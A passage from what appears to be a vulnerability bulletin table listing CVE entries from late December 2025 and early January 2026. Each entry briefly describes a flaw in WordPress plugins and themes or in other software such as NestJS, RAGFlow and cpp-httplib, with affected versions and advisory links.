| designthemes--HomeFix Elementor Portfolio | Missing Authorization vulnerability in designthemes HomeFix Elementor Portfolio homefix-ele-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HomeFix Elementor Portfolio: from n/a through <= 1.0.1. | 2025-12-30 | not yet calculated | CVE-2025-68981 | https://vdp.patchstack.com/database/Wordpress/Plugin/homefix-ele-portfolio/vulnerability/wordpress-homefix-elementor-portfolio-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| designthemes--DesignThemes LMS Addon | Missing Authorization vulnerability in designthemes DesignThemes LMS Addon designthemes-lms-addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DesignThemes LMS Addon: from n/a through <= 2.6. | 2025-12-30 | not yet calculated | CVE-2025-68982 | https://vdp.patchstack.com/database/Wordpress/Plugin/designthemes-lms-addon/vulnerability/wordpress-designthemes-lms-addon-plugin-2-6-broken-access-control-vulnerability?_s_id=cve |
| thembay--Greenmart | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Greenmart greenmart allows PHP Local File Inclusion.This issue affects Greenmart: from n/a through <= 4.2.11. | 2025-12-30 | not yet calculated | CVE-2025-68983 | https://vdp.patchstack.com/database/Wordpress/Theme/greenmart/vulnerability/wordpress-greenmart-theme-4-2-11-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Puca | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Puca puca allows PHP Local File Inclusion.This issue affects Puca: from n/a through <= 2.6.39. | 2025-12-30 | not yet calculated | CVE-2025-68984 | https://vdp.patchstack.com/database/Wordpress/Theme/puca/vulnerability/wordpress-puca-theme-2-6-39-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Aora | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Aora aora allows PHP Local File Inclusion.This issue affects Aora: from n/a through <= 1.3.15. | 2025-12-30 | not yet calculated | CVE-2025-68985 | https://vdp.patchstack.com/database/Wordpress/Theme/aora/vulnerability/wordpress-aora-theme-1-3-15-local-file-inclusion-vulnerability?_s_id=cve |
| Edge-Themes--Cinerama - A WordPress Theme for Movie Studios and Filmmakers | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Cinerama - A WordPress Theme for Movie Studios and Filmmakers cinerama allows PHP Local File Inclusion.This issue affects Cinerama - A WordPress Theme for Movie Studios and Filmmakers: from n/a through <= 2.4. | 2025-12-30 | not yet calculated | CVE-2025-68987 | https://vdp.patchstack.com/database/Wordpress/Theme/cinerama/vulnerability/wordpress-cinerama-a-wordpress-theme-for-movie-studios-and-filmmakers-theme-2-4-local-file-inclusion-vulnerability?_s_id=cve |
| o2oe--E-Invoice App Malaysia | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in o2oe E-Invoice App Malaysia einvoiceapp-malaysia allows Retrieve Embedded Sensitive Data.This issue affects E-Invoice App Malaysia: from n/a through <= 1.1.0. | 2025-12-30 | not yet calculated | CVE-2025-68988 | https://vdp.patchstack.com/database/Wordpress/Plugin/einvoiceapp-malaysia/vulnerability/wordpress-e-invoice-app-malaysia-plugin-1-1-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| Renzo Johnson--Contact Form 7 Extension For Mailchimp | Insertion of Sensitive Information Into Sent Data vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp contact-form-7-mailchimp-extension allows Retrieve Embedded Sensitive Data.This issue affects Contact Form 7 Extension For Mailchimp: from n/a through <= 0.9.49. | 2025-12-30 | not yet calculated | CVE-2025-68989 | https://vdp.patchstack.com/database/Wordpress/Plugin/contact-form-7-mailchimp-extension/vulnerability/wordpress-contact-form-7-extension-for-mailchimp-plugin-0-9-49-sensitive-data-exposure-vulnerability?_s_id=cve |
| xenioushk--BWL Pro Voting Manager | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in xenioushk BWL Pro Voting Manager bwl-pro-voting-manager allows Blind SQL Injection.This issue affects BWL Pro Voting Manager: from n/a through <= 1.4.9. | 2025-12-30 | not yet calculated | CVE-2025-68990 | https://vdp.patchstack.com/database/Wordpress/Plugin/bwl-pro-voting-manager/vulnerability/wordpress-bwl-pro-voting-manager-plugin-1-4-9-sql-injection-vulnerability?_s_id=cve |
| xenioushk--BWL Pro Voting Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in xenioushk BWL Pro Voting Manager bwl-pro-voting-manager allows DOM-Based XSS.This issue affects BWL Pro Voting Manager: from n/a through <= 1.4.9. | 2025-12-30 | not yet calculated | CVE-2025-68991 | https://vdp.patchstack.com/database/Wordpress/Plugin/bwl-pro-voting-manager/vulnerability/wordpress-bwl-pro-voting-manager-plugin-1-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| xenioushk--BWL Knowledge Base Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in xenioushk BWL Knowledge Base Manager bwl-kb-manager allows Stored XSS.This issue affects BWL Knowledge Base Manager: from n/a through <= 1.6.3. | 2025-12-30 | not yet calculated | CVE-2025-68992 | https://vdp.patchstack.com/database/Wordpress/Plugin/bwl-kb-manager/vulnerability/wordpress-bwl-knowledge-base-manager-plugin-1-6-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| XforWooCommerce--Share, Print and PDF Products for WooCommerce | Missing Authorization vulnerability in XforWooCommerce Share, Print and PDF Products for WooCommerce share-print-pdf-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Share, Print and PDF Products for WooCommerce: from n/a through <= 3.1.2. | 2025-12-30 | not yet calculated | CVE-2025-68993 | https://vdp.patchstack.com/database/Wordpress/Plugin/share-print-pdf-woocommerce/vulnerability/wordpress-share-print-and-pdf-products-for-woocommerce-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve |
| XforWooCommerce--Product Loops for WooCommerce | Missing Authorization vulnerability in XforWooCommerce Product Loops for WooCommerce product-loops allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Loops for WooCommerce: from n/a through <= 2.1.2. | 2025-12-30 | not yet calculated | CVE-2025-68994 | https://vdp.patchstack.com/database/Wordpress/Plugin/product-loops/vulnerability/wordpress-product-loops-for-woocommerce-plugin-2-1-2-broken-access-control-vulnerability?_s_id=cve |
| Gal Dubinski--My Sticky Elements | Missing Authorization vulnerability in Gal Dubinski My Sticky Elements mystickyelements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects My Sticky Elements: from n/a through <= 2.3.3. | 2025-12-30 | not yet calculated | CVE-2025-68995 | https://vdp.patchstack.com/database/Wordpress/Plugin/mystickyelements/vulnerability/wordpress-my-sticky-elements-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve |
| WebCodingPlace--Responsive Posts Carousel Pro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebCodingPlace Responsive Posts Carousel Pro responsive-posts-carousel-pro allows PHP Local File Inclusion.This issue affects Responsive Posts Carousel Pro: from n/a through <= 15.1. | 2025-12-30 | not yet calculated | CVE-2025-68996 | https://vdp.patchstack.com/database/Wordpress/Plugin/responsive-posts-carousel-pro/vulnerability/wordpress-responsive-posts-carousel-pro-plugin-15-1-local-file-inclusion-vulnerability?_s_id=cve |
| AdvancedCoding--wpDiscuz | Authorization Bypass Through User-Controlled Key vulnerability in AdvancedCoding wpDiscuz wpdiscuz allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpDiscuz: from n/a through <= 7.6.40. | 2025-12-30 | not yet calculated | CVE-2025-68997 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpdiscuz/vulnerability/wordpress-wpdiscuz-plugin-7-6-40-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Heateor Support--Heateor Social Login | Cross-Site Request Forgery (CSRF) vulnerability in Heateor Support Heateor Social Login heateor-social-login allows Cross Site Request Forgery.This issue affects Heateor Social Login: from n/a through <= 1.1.39. | 2025-12-30 | not yet calculated | CVE-2025-68998 | https://vdp.patchstack.com/database/Wordpress/Plugin/heateor-social-login/vulnerability/wordpress-heateor-social-login-plugin-1-1-39-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Atte Moisio--AM Events | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atte Moisio AM Events am-events allows Stored XSS.This issue affects AM Events: from n/a through <= 1.13.1. | 2025-12-30 | not yet calculated | CVE-2025-69006 | https://vdp.patchstack.com/database/Wordpress/Plugin/am-events/vulnerability/wordpress-am-events-plugin-1-13-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| OTWthemes--Popping Sidebars and Widgets Light | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes Popping Sidebars and Widgets Light popping-sidebars-and-widgets-light allows Stored XSS.This issue affects Popping Sidebars and Widgets Light: from n/a through <= 1.27. | 2025-12-30 | not yet calculated | CVE-2025-69007 | https://vdp.patchstack.com/database/Wordpress/Plugin/popping-sidebars-and-widgets-light/vulnerability/wordpress-popping-sidebars-and-widgets-light-plugin-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Inboxify--Inboxify Sign Up Form | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Inboxify Inboxify Sign Up Form inboxify-sign-up-form allows Stored XSS.This issue affects Inboxify Sign Up Form: from n/a through <= 1.0.4. | 2025-12-30 | not yet calculated | CVE-2025-69008 | https://vdp.patchstack.com/database/Wordpress/Plugin/inboxify-sign-up-form/vulnerability/wordpress-inboxify-sign-up-form-plugin-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kamleshyadav--Medicalequipment | Missing Authorization vulnerability in kamleshyadav Medicalequipment medicalequipment allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Medicalequipment: from n/a through <= 1.0.9. | 2025-12-30 | not yet calculated | CVE-2025-69009 | https://vdp.patchstack.com/database/Wordpress/Theme/medicalequipment/vulnerability/wordpress-medicalequipment-theme-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Themebeez Toolkit | Missing Authorization vulnerability in themebeez Themebeez Toolkit themebeez-toolkit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Themebeez Toolkit: from n/a through <= 1.3.5. | 2025-12-30 | not yet calculated | CVE-2025-69010 | https://vdp.patchstack.com/database/Wordpress/Plugin/themebeez-toolkit/vulnerability/wordpress-themebeez-toolkit-plugin-1-3-5-broken-access-control-vulnerability?_s_id=cve |
| Stephen Harris--Event Organiser | Missing Authorization vulnerability in Stephen Harris Event Organiser event-organiser allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Event Organiser: from n/a through <= 3.12.8. | 2025-12-30 | not yet calculated | CVE-2025-69012 | https://vdp.patchstack.com/database/Wordpress/Plugin/event-organiser/vulnerability/wordpress-event-organiser-plugin-3-12-8-broken-access-control-vulnerability?_s_id=cve |
| jetmonsters--Stratum | Missing Authorization vulnerability in jetmonsters Stratum stratum allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stratum: from n/a through <= 1.6.1. | 2025-12-30 | not yet calculated | CVE-2025-69013 | https://vdp.patchstack.com/database/Wordpress/Plugin/stratum/vulnerability/wordpress-stratum-plugin-1-6-1-broken-access-control-vulnerability?_s_id=cve |
| Youzify--Youzify | Server-Side Request Forgery (SSRF) vulnerability in Youzify Youzify youzify allows Server Side Request Forgery.This issue affects Youzify: from n/a through <= 1.3.5. | 2025-12-30 | not yet calculated | CVE-2025-69014 | https://vdp.patchstack.com/database/Wordpress/Plugin/youzify/vulnerability/wordpress-youzify-plugin-1-3-5-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Automattic--Crowdsignal Forms | Missing Authorization vulnerability in Automattic Crowdsignal Forms crowdsignal-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Crowdsignal Forms: from n/a through <= 1.7.2. | 2025-12-30 | not yet calculated | CVE-2025-69015 | https://vdp.patchstack.com/database/Wordpress/Plugin/crowdsignal-forms/vulnerability/wordpress-crowdsignal-forms-plugin-1-7-2-broken-access-control-vulnerability?_s_id=cve |
| averta--Shortcodes and extra features for Phlox theme | Missing Authorization vulnerability in averta Shortcodes and extra features for Phlox theme auxin-elements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shortcodes and extra features for Phlox theme: from n/a through <= 2.17.12. | 2025-12-30 | not yet calculated | CVE-2025-69016 | https://vdp.patchstack.com/database/Wordpress/Plugin/auxin-elements/vulnerability/wordpress-shortcodes-and-extra-features-for-phlox-theme-plugin-2-17-12-broken-access-control-vulnerability?_s_id=cve |
| Magnigenie--RestroPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magnigenie RestroPress restropress allows Stored XSS.This issue affects RestroPress: from n/a through <= 3.2.4.2. | 2025-12-30 | not yet calculated | CVE-2025-69017 | https://vdp.patchstack.com/database/Wordpress/Plugin/restropress/vulnerability/wordpress-restropress-plugin-3-2-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Shamalli--Web Directory Free | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shamalli Web Directory Free web-directory-free allows DOM-Based XSS.This issue affects Web Directory Free: from n/a through <= 1.7.12. | 2025-12-30 | not yet calculated | CVE-2025-69018 | https://vdp.patchstack.com/database/Wordpress/Plugin/web-directory-free/vulnerability/wordpress-web-directory-free-plugin-1-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FlippingBook--FlippingBook | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FlippingBook FlippingBook flippingbook allows DOM-Based XSS.This issue affects FlippingBook: from n/a through <= 2.0.1. | 2025-12-30 | not yet calculated | CVE-2025-69019 | https://vdp.patchstack.com/database/Wordpress/Plugin/flippingbook/vulnerability/wordpress-flippingbook-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Tribulant Software--Newsletters | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tribulant Software Newsletters newsletters-lite allows Stored XSS.This issue affects Newsletters: from n/a through <= 4.12. | 2025-12-30 | not yet calculated | CVE-2025-69020 | https://vdp.patchstack.com/database/Wordpress/Plugin/newsletters-lite/vulnerability/wordpress-newsletters-plugin-4-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Ays Pro--Popup box | Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Popup box ays-popup-box allows Cross Site Request Forgery.This issue affects Popup box: from n/a through <= 6.0.7. | 2025-12-30 | not yet calculated | CVE-2025-69021 | https://vdp.patchstack.com/database/Wordpress/Plugin/ays-popup-box/vulnerability/wordpress-popup-box-plugin-6-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Weblizar - WordPress Themes & Plugin--HR Management Lite | Missing Authorization vulnerability in Weblizar - WordPress Themes & Plugin HR Management Lite hr-management-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HR Management Lite: from n/a through <= 3.5. | 2025-12-30 | not yet calculated | CVE-2025-69022 | https://vdp.patchstack.com/database/Wordpress/Plugin/hr-management-lite/vulnerability/wordpress-hr-management-lite-plugin-3-5-broken-access-control-vulnerability?_s_id=cve |
| Marketing Fire--Discussion Board | Missing Authorization vulnerability in Marketing Fire Discussion Board wp-discussion-board allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Discussion Board: from n/a through <= 2.5.7. | 2025-12-30 | not yet calculated | CVE-2025-69023 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-discussion-board/vulnerability/wordpress-discussion-board-plugin-2-5-7-broken-access-control-vulnerability?_s_id=cve |
| bizswoop--BizPrint | Missing Authorization vulnerability in bizswoop BizPrint print-google-cloud-print-gcp-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BizPrint: from n/a through <= 4.6.7. | 2025-12-30 | not yet calculated | CVE-2025-69024 | https://vdp.patchstack.com/database/Wordpress/Plugin/print-google-cloud-print-gcp-woocommerce/vulnerability/wordpress-bizprint-plugin-4-6-7-broken-access-control-vulnerability?_s_id=cve |
| Aethonic--Poptics: AI-Powered Popup Builder for Lead Generation, Conversions, Exit-Intent, Email Opt-ins & WooCommerce Sales | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Aethonic Poptics: AI-Powered Popup Builder for Lead Generation, Conversions, Exit-Intent, Email Opt-ins & WooCommerce Sales poptics allows Retrieve Embedded Sensitive Data.This issue affects Poptics: AI-Powered Popup Builder for Lead Generation, Conversions, Exit-Intent, Email Opt-ins & WooCommerce Sales: from n/a through <= 1.0.20. | 2025-12-30 | not yet calculated | CVE-2025-69025 | https://vdp.patchstack.com/database/Wordpress/Plugin/poptics/vulnerability/wordpress-poptics-ai-powered-popup-builder-for-lead-generation-conversions-exit-intent-email-opt-ins-woocommerce-sales-plugin-1-0-20-sensitive-data-exposure-vulnerability?_s_id=cve |
| Roxnor--PopupKit | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Roxnor PopupKit popup-builder-block allows Retrieve Embedded Sensitive Data.This issue affects PopupKit: from n/a through <= 2.1.5. | 2025-12-30 | not yet calculated | CVE-2025-69026 | https://vdp.patchstack.com/database/Wordpress/Plugin/popup-builder-block/vulnerability/wordpress-popupkit-plugin-2-1-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| tychesoftwares--Product Delivery Date for WooCommerce Lite | Missing Authorization vulnerability in tychesoftwares Product Delivery Date for WooCommerce - Lite product-delivery-date-for-woocommerce-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Delivery Date for WooCommerce - Lite: from n/a through <= 3.2.0. | 2025-12-30 | not yet calculated | CVE-2025-69027 | https://vdp.patchstack.com/database/Wordpress/Plugin/product-delivery-date-for-woocommerce-lite/vulnerability/wordpress-product-delivery-date-for-woocommerce-lite-plugin-3-2-0-broken-access-control-vulnerability?_s_id=cve |
| BoldGrid--weForms | Missing Authorization vulnerability in BoldGrid weForms weforms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects weForms: from n/a through <= 1.6.25. | 2025-12-30 | not yet calculated | CVE-2025-69028 | https://vdp.patchstack.com/database/Wordpress/Plugin/weforms/vulnerability/wordpress-weforms-plugin-1-6-25-broken-access-control-vulnerability?_s_id=cve |
| Select-Themes--Struktur | Authorization Bypass Through User-Controlled Key vulnerability in Select-Themes Struktur struktur allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Struktur: from n/a through <= 2.5.1. | 2025-12-30 | not yet calculated | CVE-2025-69029 | https://vdp.patchstack.com/database/Wordpress/Theme/struktur/vulnerability/wordpress-struktur-theme-2-5-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Backpack Traveler | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Backpack Traveler backpacktraveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backpack Traveler: from n/a through <= 2.10.3. | 2025-12-30 | not yet calculated | CVE-2025-69030 | https://vdp.patchstack.com/database/Wordpress/Theme/backpacktraveler/vulnerability/wordpress-backpack-traveler-theme-2-10-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Skywarrior--Arcane | Missing Authorization vulnerability in Skywarrior Arcane arcane allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Arcane: from n/a through <= 3.6.6. | 2025-12-30 | not yet calculated | CVE-2025-69031 | https://vdp.patchstack.com/database/Wordpress/Theme/arcane/vulnerability/wordpress-arcane-theme-3-6-6-broken-access-control-vulnerability?_s_id=cve |
| Mikado-Themes--FiveStar | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes FiveStar fivestar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FiveStar: from n/a through <= 1.7. | 2025-12-30 | not yet calculated | CVE-2025-69032 | https://vdp.patchstack.com/database/Wordpress/Theme/fivestar/vulnerability/wordpress-fivestar-theme-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| A WP Life--Blog Filter | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in A WP Life Blog Filter blog-filter allows DOM-Based XSS.This issue affects Blog Filter: from n/a through <= 1.7.3. | 2025-12-30 | not yet calculated | CVE-2025-69033 | https://vdp.patchstack.com/database/Wordpress/Plugin/blog-filter/vulnerability/wordpress-blog-filter-plugin-1-7-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Mikado-Themes--Lekker | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Lekker lekker allows PHP Local File Inclusion.This issue affects Lekker: from n/a through <= 1.8. | 2025-12-30 | not yet calculated | CVE-2025-69034 | https://vdp.patchstack.com/database/Wordpress/Theme/lekker/vulnerability/wordpress-lekker-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| Vidish--Combo Offers WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vidish Combo Offers WooCommerce woo-combo-offers allows DOM-Based XSS.This issue affects Combo Offers WooCommerce: from n/a through <= 4.2. | 2025-12-30 | not yet calculated | CVE-2025-69088 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-combo-offers/vulnerability/wordpress-combo-offers-woocommerce-plugin-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| autolistings--Auto Listings | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in autolistings Auto Listings auto-listings allows Stored XSS.This issue affects Auto Listings: from n/a through <= 2.7.1. | 2025-12-30 | not yet calculated | CVE-2025-69089 | https://vdp.patchstack.com/database/Wordpress/Plugin/auto-listings/vulnerability/wordpress-auto-listings-plugin-2-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Kraft Plugins--Demo Importer Plus | Missing Authorization vulnerability in Kraft Plugins Demo Importer Plus demo-importer-plus allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Demo Importer Plus: from n/a through <= 2.0.8. | 2025-12-30 | not yet calculated | CVE-2025-69091 | https://vdp.patchstack.com/database/Wordpress/Plugin/demo-importer-plus/vulnerability/wordpress-demo-importer-plus-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve |
| WPDeveloper--Essential Addons for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Essential Addons for Elementor essential-addons-for-elementor-lite allows DOM-Based XSS.This issue affects Essential Addons for Elementor: from n/a through <= 6.5.3. | 2025-12-30 | not yet calculated | CVE-2025-69092 | https://vdp.patchstack.com/database/Wordpress/Plugin/essential-addons-for-elementor-lite/vulnerability/wordpress-essential-addons-for-elementor-plugin-6-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wpdesk--ShopMagic | Missing Authorization vulnerability in wpdesk ShopMagic shopmagic-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ShopMagic: from n/a through <= 4.7.2. | 2025-12-30 | not yet calculated | CVE-2025-69093 | https://vdp.patchstack.com/database/Wordpress/Plugin/shopmagic-for-woocommerce/vulnerability/wordpress-shopmagic-plugin-4-7-2-broken-access-control-vulnerability?_s_id=cve |
| Quenary--tugtainer | Tugtainer is a self-hosted app for automating updates of docker containers. In versions prior to 1.15.1, arbitary arguments can be injected in tugtainer-agent `POST api/command/run`. Version 1.15.1 fixes the issue. | 2025-12-29 | not yet calculated | CVE-2025-69201 | https://github.com/Quenary/tugtainer/security/advisories/GHSA-grc3-8w5x-g54q https://github.com/Quenary/tugtainer/pull/88 https://github.com/Quenary/tugtainer/commit/dbb17d843e30fd7509acf0328c913dcb42f40831 https://github.com/Quenary/tugtainer/releases/tag/v1.15.1 |
| arthurfiorette--axios-cache-interceptor | Axios Cache Interceptor is a cache interceptor for axios. Prior to version 1.11.1, when a server calls an upstream service using different auth tokens, axios-cache-interceptor returns incorrect cached responses, leading to authorization bypass. The cache key is generated only from the URL, ignoring request headers like `Authorization`. When the server responds with `Vary: Authorization` (indicating the response varies by auth token), the library ignores this, causing all requests to share the same cache regardless of authorization. Server-side applications (APIs, proxies, backend services) that use axios-cache-interceptor to cache requests to upstream services, handle requests from multiple users with different auth tokens, and upstream services replies on `Vary` to differentiate caches are affected. Browser/client-side applications (single user per browser session) are not affected. Services using different auth tokens to call upstream services will return incorrect cached data, bypassing authorization checks and leaking user data across different authenticated sessions. After `v1.11.1`, automatic `Vary` header support is now enabled by default. When server responds with `Vary: Authorization`, cache keys now include the authorization header value. Each user gets their own cache. | 2025-12-29 | not yet calculated | CVE-2025-69202 | https://github.com/arthurfiorette/axios-cache-interceptor/security/advisories/GHSA-x4m5-4cw8-vc44 https://github.com/arthurfiorette/axios-cache-interceptor/commit/49a808059dfc081b9cc23d48f243d55dfce15f01 |
| NeoRazorX--facturascripts | FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.7, a stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator's browser session. Version 2025.7 fixes the issue. | 2025-12-30 | not yet calculated | CVE-2025-69210 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-2267-xqcf-gw2m https://facturascripts.com/publicaciones/ya-disponible-facturascripts-2025-7 https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7 |
| nestjs--nest | Nest is a framework for building scalable Node.js server-side applications. Versions prior to 11.1.11 have a Fastify URL encoding middleware bypass. A NestJS application is vulnerable if it uses `@nestjs/platform-fastify`; relies on `NestMiddleware` (via `MiddlewareConsumer`) for security checks (authentication, authorization, etc.), or through `app.use()`; and applies middleware to specific routes using string paths or controllers (e.g., `.forRoutes('admin')`). Exploitation can result in unauthenticated users accessing protected routes, restricted administrative endpoints becoming accessible to lower-privileged users, and/or middleware performing sanitization or validation being skipped. This issue is patched in `@nestjs/platform-fastify@11.1.11`. | 2025-12-29 | not yet calculated | CVE-2025-69211 | https://github.com/nestjs/nest/security/advisories/GHSA-8wpr-639p-ccrj https://github.com/nestjs/nest/commit/c4cedda15a05aafec1e6045b36b0335ab850e771 |
| NAVER--NAVER Whale browser | Whale browser before 4.35.351.12 allows an attacker to escape the iframe sandbox in a sidebar environment. | 2025-12-30 | not yet calculated | CVE-2025-69234 | https://cve.naver.com/detail/cve-2025-69234.html |
| NAVER--NAVER Whale browser | Whale browser before 4.35.351.12 allows an attacker to bypass the Same-Origin Policy in a sidebar environment. | 2025-12-30 | not yet calculated | CVE-2025-69235 | https://cve.naver.com/detail/cve-2025-69235.html |
| WasmEdge--WasmEdge | WasmEdge is a WebAssembly runtime. Prior to version 0.16.0-alpha.3, a multiplication in `WasmEdge/include/runtime/instance/memory.h` can wrap, causing `checkAccessBound()` to incorrectly allow the access. This leads to a segmentation fault. Version 0.16.0-alpha.3 contains a patch for the issue. | 2025-12-30 | not yet calculated | CVE-2025-69261 | https://github.com/WasmEdge/WasmEdge/security/advisories/GHSA-89fm-8mr7-gg4m https://github.com/WasmEdge/WasmEdge/commit/37cc9fa19bd23edbbdaa9252059b17f191fa4d17 |
| infiniflow--ragflow | RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In versions prior to 0.22.0, the use of an insecure key generation algorithm in the API key and beta (assistant/agent share auth) token generation process allows these tokens to be mutually derivable. Specifically, both tokens are generated using the same `URLSafeTimedSerializer` with predictable inputs, enabling an unauthorized user who obtains the shared assistant/agent URL to derive the personal API key. This grants them full control over the assistant/agent owner's account. Version 0.22.0 fixes the issue. | 2025-12-31 | not yet calculated | CVE-2025-69286 | https://github.com/infiniflow/ragflow/security/advisories/GHSA-9j5g-g4xm-57w7 https://github.com/infiniflow/ragflow/commit/a3bb4aadcc3494fb27f2a9933b4c46df8eb532e6 https://github.com/infiniflow/ragflow/blob/v0.20.5/api/apps/system_app.py#L214-L215 https://github.com/infiniflow/ragflow/blob/v0.20.5/api/utils/__init__.py#L343 https://github.com/infiniflow/ragflow/blob/v0.20.5/api/utils/api_utils.py#L378 |
| QNAP Systems Inc.--QTS | An exposure of sensitive system information to an unauthorized control sphere vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to read application data. We have already fixed the vulnerability in the following versions: QTS 5.2.8.3332 build 20251128 and later QuTS hero h5.2.8.3321 build 20251117 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-9110 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.30.0, the ``write_headers`` function does not check for CR & LF characters in user supplied headers, allowing untrusted header value to escape header lines. This vulnerability allows attackers to add extra headers, modify request body unexpectedly & trigger an SSRF attack. When combined with a server that supports http1.1 pipelining (springboot, python twisted etc), this can be used for server side request forgery (SSRF). Version 0.30.0 fixes this issue. | 2026-01-01 | not yet calculated | CVE-2026-21428 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-wpc6-j37r-jcx7 https://github.com/yhirose/cpp-httplib/commit/98048a033a532ff22320ce1d11789f8d5710dfcd https://github.com/yhirose/cpp-httplib/releases/tag/v0.30.0 |
